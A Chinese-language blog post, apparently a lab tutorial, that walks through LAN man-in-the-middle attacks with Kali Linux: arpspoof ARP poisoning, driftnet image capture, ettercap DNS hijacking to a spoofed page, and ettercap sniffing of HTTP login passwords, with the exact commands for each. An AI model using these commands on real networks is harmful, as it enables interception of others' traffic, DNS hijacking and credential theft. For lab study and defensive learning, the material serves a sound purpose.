中间人攻击-流量欺骗与流量劫持总结

字数统计: 2.4k字   |   阅读时长≈ 9分

无线欺骗攻击中,多数是以无线中间人攻击体现的。中间人攻击是一种“间接”的入侵攻击,是通过拦截、插入、伪造、终端数据包等各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。

渗透有风险,点到为止!

一、中间人攻击简介

无线欺骗攻击中,多数是以无线中间人攻击体现的。中间人攻击是一种“间接”的入侵攻击,是通过拦截、插入、伪造、终端数据包等各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。

二、常用的欺骗工具

在kali linux里面有欺骗工具包,包括Ettercap、ARPSpoof、DNSChef、SSLStrip等。

三、中间人攻击(一) -arpspoof+drifrnet实现MiTM攻击

1、MiTM攻击简介

MiTM攻击是通过劫持两个用户之间的流量来实现的,而这种流量可以通过使用Wireshark和其他数据包嗅探器等工具来监测到.。你可以在本文接下来的部分,看到Wireshark是如何对每个数据包的细节进行嗅探的,研究者们可以使用Wireshark来捕获这些数据包以供日后的详细分析。
假设有外国政府间谍正在对一位专家的电脑进行监控,我的任务就是检查他们是否从该专家的电脑里盗取了具有图片性质的信息,比如机密地图、计划、知识产权等。这样,为了弄清事情的危害程度,我就要具体判断这些被传输的图片信息到底是什么内容。
首先,我需要进行MitM,把自己置于攻击目标和路由器之间。这样,所有的流量我就都可以监测到了。完成MitM之后,我需要使用一个名为“driftnet”的工具,driftnet是一款用于抓取指定接口数据流上面图片的软件。这样我就能将图片信息存储并显示在我的计算机上。

2、arpspoof实施MiTM攻击

在进行MiTM的方法上,我刚开始有arpspoof和Ettercap两种选择。

ettercap是一款现有流行的网络抓包软件,它利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击,在目标与服务器之间充当中间人,嗅探两者之间的数据流量,从中窃取用户的数据资料。
而arpspoof同样也可以完成APR欺骗,在经过对比后,我发现虽然Ettercap使用起来更加简单上手,但arpspoof却更加可靠。于是最后,我决定用arpspoof实施MiTM。

1)信息收集

获取kali的IP地址

ifconfig
192.168.200.129

image-20210627224301536

获取受害者IP地址

ipconfig
192.168.200.134

image-20210627224205774

2)开启IP地址转发

echo 1 >/proc/sys/net/ipv4/ip_forward

image-20210627232423257

3) 开始欺骗

arpspoof -i eth0 -t 192.168.200.134 192.168.200.1

image-20210628000158308

1.命令"arpspoof -i网卡 -t目标IP网关IP”的作用是将目标机数据经Kali后传给网关。
2.命令"“arpspoof -i 网关IP目标IP”的作用是将网关返回的数据经Kali后到达目标机。

3、driftnet接收图片

driftnet是一款简单而使用的图片捕获工具,能够捕获到网络数据包中的图片,同时支持抓取和显示音频文件,可用于捕获微信朋友圈中的相片、微博配图等等。

现在,我应该可以看到双方发送或接收的所有图片,下一步我要做的就是激活driftnet。我可以通过在Kali的任何终端输入driftnet来做到这一点,不过切记,不要使用arpspoof运行的开放终端,因为这将终止arpspoof。

如果kali没有,直接下载即可

apt-get install driftnet

image-20210627233957669

看到窗口在获取信息,这时可以打开抓取工具

driftnet -i eth0 (-i 指定监听的网络接口)

image-20210627234155654

使用受害者电脑访问4399网站,我们在kali上抓到了图片(HTTP协议才能抓到,HTTPS抓不到)

image-20210804144036287

4、解决drifrnet无法抓取图片问题

drifrnet无法抓取图片,这与arpspoof的命令有关

网上的教程大多是

arpspoof -i 【网卡名称】 -t 【受害者IP】 【网关IP】
arpspoof -i eth0 192.168.200.134 192.168.200.2

这时使用wireshark抓包观察

image-20210628003414270

我们看到在kali上抓取eth0网卡的数据,筛选受害者IP,看到了抓到了受害者的流量。

可以看到,抓到的都是受害者ip (即192.168.200.134)发出的请求。所依上面的那条命令指的是,把我自己伪装成网关,局域网内的其他受害主机发出的请求报文,全部先发给我。
那么,通过计算机网络的基础知识可知,如果想要抓取图片流,上述命令只能抓到本地上传的图片。
如果你要抓取请求到的图片,你就不能使用上述命令。

需要改成

arpspoof -i [网卡名称] -t [网关IP] [受害者IP]
arpspoof -i eth0 -t 192.168.200.1 192.168.200.134

问题来了,如果我即想抓取请求图片流,又想抓取响应图片流呢

arpspoof -i [网卡名称] -r [网关IP] -t [受害者IP]
arpspoof -i eth0 -r 192.168.200.1 -t 192.168.200.134

image-20210628005403191

5、永久保存操作

driftnet -i eth0 -b -a -d 目录

image-20210628005708283

image-20210628005744935

四、中间人攻击(二) -ARP欺骗

1、流量转发

仅仅是截获流量,被攻击主机很容易发现异常,如何神不知鬼不觉的监视被攻击的主机呢?这就需要我们启动流量转发功能!
进行DNS欺骗之前,要检查攻击机,有没有开启IP转发。
Net.ipv4.ip_forward=0,则IP转发没有开启,需要手动将其设为1。

sysctl net.ipv4.ip_forward
#如果为0,使用下面命令修改为1
sysctl -w net.ipv4.ip_forward=1
或者修改此处
vi /etc/sysctl.conf

image-20210628010301617

2、开启apache服务

service apache2 start

image-20210628230722527

3 、修改DNS并设计页面

1)修改便捷式ettercap中的DNS文件

vi /etc/ettercap/etter.dns

image-20210628231011480

* A 192.168.200.129
"*"代表DNS劫持后指定跳转的页面,例如“*”改为www.qq.com,那么被劫持的对象访问了WWW.qq.com会跳转到192.168.200.129的apache页面上来。
“A 192.168.200.129”指的是劫持后跳转的地址信息,记住本地的eth网卡地址

2)设计index.html文件

该文件是网站的主页文件。可以修改原来的index.html,也可以自己写一个新的页面,替换掉之前的index.html。

image-20210628231622410

<HTML>
<head>
<title>ARE YOU KIDDING</title>
<h1>hellow, test.....!!</h1>
<body>
SOMETHING FOR NOTHING!
</body>
</head>
</HTML>

测试访问index.html

http://127.0.0.1/

image-20210628232202029

4、启动ettercap图形界面

1)启动大蜘蛛

ettercap -G

image-20210628232419805

-G命令是开起GUI模式。大家不喜欢使用图形界面的话,ettercap也有命令行模式,后面我也会附上ettercap进行DNS欺骗的命令。

2) 配置网卡

局域网内搭建的环境,选择eth0。

image-20210628232707420

根据实际情况选择网卡

3)介绍功能

确定eth0网卡,选择好网卡后点击勾就行

image-20210628233533987

开启搜索和停止搜索

image-20210628233732336

4)扫描存活主机

Host->Scan for hosts->hosts list扫描网段内的主机数量,并列出。

image-20210628234010913

5)列出扫描到的主机

image-20210628234054588

image-20210628234105996

可发现存活的主机的mac和IP

6)添加网关和被监听的主机

选择192.168.200.134(被害者主机)后点击Add to Target1会出现:Host 192.168.200.134 Add to Target1

image-20210629000111050

然后在选择192.168.200.2网关后点击Add to Target2 出现:Host 192.168.200.1 Add to Target2

image-20210629000142699

7)配置arp poisoning

开启ARP毒化,选择远程嗅探连接和远程窃听

image-20210629000235664

image-20210629000257728

8)配置插件

Plugins->Manage plugins,然后双击dns_spoof:劫持的意思,会弹出Activating dns_spoof plugin... :

image-20210628234959252

image-20210629000347466

9)成功DNS劫持

这时候不管受害者电脑访问任何http协议的网站,都会跳转到我指定的index.html界面

http协议网站

image-20210629000703733

HTTPS协议网站

image-20210629000723182

10)分析检查

查看受害者的arp表

image-20210629000839008

我们看到了网卡的mac地址和kali的mac地址一致,正确情况下mac地址不可能一致

ping找到劫持的IP

image-20210629001018966

我们看到了kali的地址,如果想停止arp劫持,关闭arpspoof窗口即可。

五、中间人攻击(三) arpspoof+Ettercap嗅探密码

1、开启路由转发

echo 1 >/proc/sys/net/ipv4/ip_forward

image-20210629001535770

利用arpspoof进行攻击欺骗

arpspoof -i eth0 -t 192.168.200.134(受害者IP) 192.168.200.2 (网关)
arpspoof -i eth0 -r 192.168.200.2 -t 192.168.200.134

image-20210629001840032

2、使用Ettercap进行ARP欺骗

嗅探http登录密码

ettercap -Tq -i eth0

image-20210629002007914

3、获取浏览用户密码

image-20210629002323094

六 总结

首先介绍了什么是中间人及攻击的方式。
使用arpspoof+drifrnet工具实现劫持两个用户之间的流量来实现MiTM攻击。
截获流量,被攻击主机很容易发现异常,所用通过ettercap工具实现ARP欺骗,实现DNS劫持等攻击。
使用arpspoof+Ettercap工具嗅探密码,首先arpspoof进行攻击欺骗,再使用Ettercap进行嗅探http协议中的登录密码。

谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

俗话说“好记性不如烂笔头”,各个安全社区各自为战,当我们想要搜索某一方面的文章的时候总是得在各个平台之间来回横跳,于是乎,一个平台文章聚合搜索的想法诞生了。
然后正好我想有一个自己的博客,于是乎两者融合在了一起。
下面简单介绍各个导航的区别:
个人文章:本人的笔记、复现、总结等或者本人参与的共同创作。
收集文章:手工从公众号收集保存的文章,更新频率看本人喜好所以比较慢。
聚合文章:从各大平台收集整理,由工具实现,每天更新。
很惭愧,只做了一点微小的工作。